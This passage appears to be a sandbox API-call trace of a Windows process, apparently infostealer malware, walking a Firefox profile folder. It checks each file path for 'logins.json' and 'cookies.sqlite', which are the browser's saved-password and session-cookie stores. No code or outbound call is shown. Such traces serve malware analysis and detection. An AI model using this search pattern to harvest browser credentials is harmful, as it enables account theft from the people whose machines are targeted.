HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="logins.json") returned 0x0 [0160.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js", lpSrch="cookies.sqlite") returned 0x0 [0160.901] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.901] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6f36850, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x50000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="signons.sqlite", cAlternateFileName="SIGNON~1.SQL")) returned 1 [0160.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.901] lstrlenW (lpString="\\") returned 1 [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.901] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.901] lstrlenW (lpString="signons.sqlite") returned 14 [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0160.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.901] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" [0160.901] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="logins.json") returned 0x0 [0160.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.901] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.901] GetProcessHeap () returned 0x8e0000 [0160.901] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.901] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0160.901] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.902] lstrlenW (lpString="\\") returned 1 [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.902] lstrlenW (lpString="times.json") returned 10 [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x926420 [0160.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" [0160.902] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="logins.json") returned 0x0 [0160.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="cookies.sqlite") returned 0x0 [0160.902] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.902] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0160.902] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0160.902] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0160.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.902] lstrlenW (lpString="\\") returned 1 [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.902] lstrlenW (lpString="webapps") returned 7 [0160.902] GetProcessHeap () returned 0x8e0000 [0160.902] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x926420 [0160.902] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.902] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.902] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.903] GetProcessHeap () returned 0x8e0000 [0160.903] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0160.903] lstrlenW (lpString="") returned 0 [0160.903] GetProcessHeap () returned 0x8e0000 [0160.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x924da0 [0160.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0160.903] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0160.903] lstrlenW (lpString="\\*.*") returned 4 [0160.903] GetProcessHeap () returned 0x8e0000 [0160.903] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924e68 [0160.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.903] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*" [0160.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.935] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.935] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.935] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.935] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.935] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 1 [0160.935] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0160.935] lstrlenW (lpString="\\") returned 1 [0160.935] GetProcessHeap () returned 0x8e0000 [0160.935] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9252c0 [0160.935] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.935] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0160.935] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0160.935] lstrlenW (lpString="webapps.json") returned 12 [0160.935] GetProcessHeap () returned 0x8e0000 [0160.935] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925390 [0160.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0160.936] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" [0160.936] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0160.936] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="logins.json") returned 0x0 [0160.936] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="cookies.sqlite") returned 0x0 [0160.936] VirtualQuery (in: lpAddress=0x925390, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925390 | out: hHeap=0x8e0000) returned 1 [0160.936] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 0 [0160.936] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0160.936] VirtualQuery (in: lpAddress=0x924e68, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e68 | out: hHeap=0x8e0000) returned 1 [0160.936] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.936] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.936] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.936] lstrlenW (lpString="\\") returned 1 [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.936] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.936] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.936] lstrlenW (lpString="webapps") returned 7 [0160.936] GetProcessHeap () returned 0x8e0000 [0160.936] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x926420 [0160.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0160.937] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.937] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="logins.json") returned 0x0 [0160.937] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="cookies.sqlite") returned 0x0 [0160.937] VirtualQuery (in: 